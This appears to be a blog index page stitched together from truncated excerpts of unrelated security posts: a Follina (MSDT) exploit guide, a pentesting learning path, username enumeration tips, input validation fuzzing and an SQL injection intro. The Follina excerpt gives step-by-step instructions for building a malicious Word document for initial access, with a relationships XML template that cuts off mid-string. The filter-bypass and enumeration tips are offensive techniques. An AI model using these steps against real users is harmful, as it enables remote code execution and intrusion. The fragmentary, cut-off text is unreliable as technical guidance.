MSDT-Follina Exploit for Initial Access
A new remote code execution vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) that can be exploited through Microsoft Office Word (2013-2021).

Developing the exploit
Step 1: Create a docx file in Microsoft Office Word.
Step 2: Open it for editing with 7-Zip.
Step 3: Go to word\_rels\document.xml.rels, right-click > Edit. The content should be exactly:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.
Penetration Testing Learning Path
It is a long journey. We need to prepare ourselves to keep adjusting and learning new methods and techniques. Beginners can follow this path to start learning penetration testing. This is just a short syllabus; there are more advanced topics, but it is a good start for newbies! Many people asked me whether there is a learning path I can recommend. So, to help them, I published it here; it is already published on my GitHub, along with some YouTube videos.
Pentesting Web Auth
Username Enumeration
Usernames can be enumerated in various ways. For example: test with a valid and an invalid username and observe the error message, and also compare the Content-Length of both responses. Analyze the URL for different behaviors, such as a valid user getting https://redtm.com/valid?err=1 and a wrong user getting https://redtm.com/valid?err=0. Observe the HTTP error code, such as a valid user URL https://ip/admin returning 403 whereas https://ip/wrongUser returns 404. Analyze the page title; it could differ for wrong and right usernames.
Server-Side input validation testing
The common techniques to find input validation vulnerabilities: fuzz all parameters for OS command injection; encode the payload in different ways to bypass filters.

SQL Injection
SQL injection is one of the most popular web hacking techniques. If the web app is vulnerable to SQL injection, attackers can read and write data in the database, and in some cases execute system commands. Union-based SQLi: we can retrieve data from different database tables.